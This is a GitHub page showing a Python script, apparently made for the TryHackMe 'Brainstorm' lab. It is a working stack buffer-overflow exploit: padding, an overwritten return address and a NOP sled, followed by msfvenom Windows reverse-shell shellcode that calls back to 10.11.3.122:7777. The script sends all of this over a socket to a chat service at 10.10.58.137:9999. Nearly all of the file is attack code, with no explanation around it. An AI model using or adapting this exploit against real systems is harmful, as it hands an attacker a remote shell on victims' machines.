-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy paththm-brainstorm-revshell.py
More file actions
49 lines (43 loc) · 2.01 KB
/
thm-brainstorm-revshell.py
File metadata and controls
49 lines (43 loc) · 2.01 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import socket
import sys
username = b"puckie"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
#generated with msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=7777 -b"\x00" -f c EXITFUNC=thread
payload = (b"\xbf\x81\x0b\x8f\xa7\xd9\xeb\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
b"\x52\x31\x7d\x12\x83\xed\xfc\x03\xfc\x05\x6d\x52\x02\xf1\xf3"
b"\x9d\xfa\x02\x94\x14\x1f\x33\x94\x43\x54\x64\x24\x07\x38\x89"
b"\xcf\x45\xa8\x1a\xbd\x41\xdf\xab\x08\xb4\xee\x2c\x20\x84\x71"
b"\xaf\x3b\xd9\x51\x8e\xf3\x2c\x90\xd7\xee\xdd\xc0\x80\x65\x73"
b"\xf4\xa5\x30\x48\x7f\xf5\xd5\xc8\x9c\x4e\xd7\xf9\x33\xc4\x8e"
b"\xd9\xb2\x09\xbb\x53\xac\x4e\x86\x2a\x47\xa4\x7c\xad\x81\xf4"
b"\x7d\x02\xec\x38\x8c\x5a\x29\xfe\x6f\x29\x43\xfc\x12\x2a\x90"
b"\x7e\xc9\xbf\x02\xd8\x9a\x18\xee\xd8\x4f\xfe\x65\xd6\x24\x74"
b"\x21\xfb\xbb\x59\x5a\x07\x37\x5c\x8c\x81\x03\x7b\x08\xc9\xd0"
b"\xe2\x09\xb7\xb7\x1b\x49\x18\x67\xbe\x02\xb5\x7c\xb3\x49\xd2"
b"\xb1\xfe\x71\x22\xde\x89\x02\x10\x41\x22\x8c\x18\x0a\xec\x4b"
b"\x5e\x21\x48\xc3\xa1\xca\xa9\xca\x65\x9e\xf9\x64\x4f\x9f\x91"
b"\x74\x70\x4a\x35\x24\xde\x25\xf6\x94\x9e\x95\x9e\xfe\x10\xc9"
b"\xbf\x01\xfb\x62\x55\xf8\x6c\x87\xa1\x01\x17\xff\xb7\x05\xf9"
b"\x9e\x3e\xe3\x6f\x71\x17\xbc\x07\xe8\x32\x36\xb9\xf5\xe8\x33"
b"\xf9\x7e\x1f\xc4\xb4\x76\x6a\xd6\x21\x77\x21\x84\xe4\x88\x9f"
b"\xa0\x6b\x1a\x44\x30\xe5\x07\xd3\x67\xa2\xf6\x2a\xed\x5e\xa0"
b"\x84\x13\xa3\x34\xee\x97\x78\x85\xf1\x16\x0c\xb1\xd5\x08\xc8"
b"\x3a\x52\x7c\x84\x6c\x0c\x2a\x62\xc7\xfe\x84\x3c\xb4\xa8\x40"
b"\xb8\xf6\x6a\x16\xc5\xd2\x1c\xf6\x74\x8b\x58\x09\xb8\x5b\x6d"
b"\x72\xa4\xfb\x92\xa9\x6c\x1b\x71\x7b\x99\xb4\x2c\xee\x20\xd9"
b"\xce\xc5\x67\xe4\x4c\xef\x17\x13\x4c\x9a\x12\x5f\xca\x77\x6f"
b"\xf0\xbf\x77\xdc\xf1\x95")
try:
print("Sending the payload ...")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.58.137',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server ...")
sys.exit()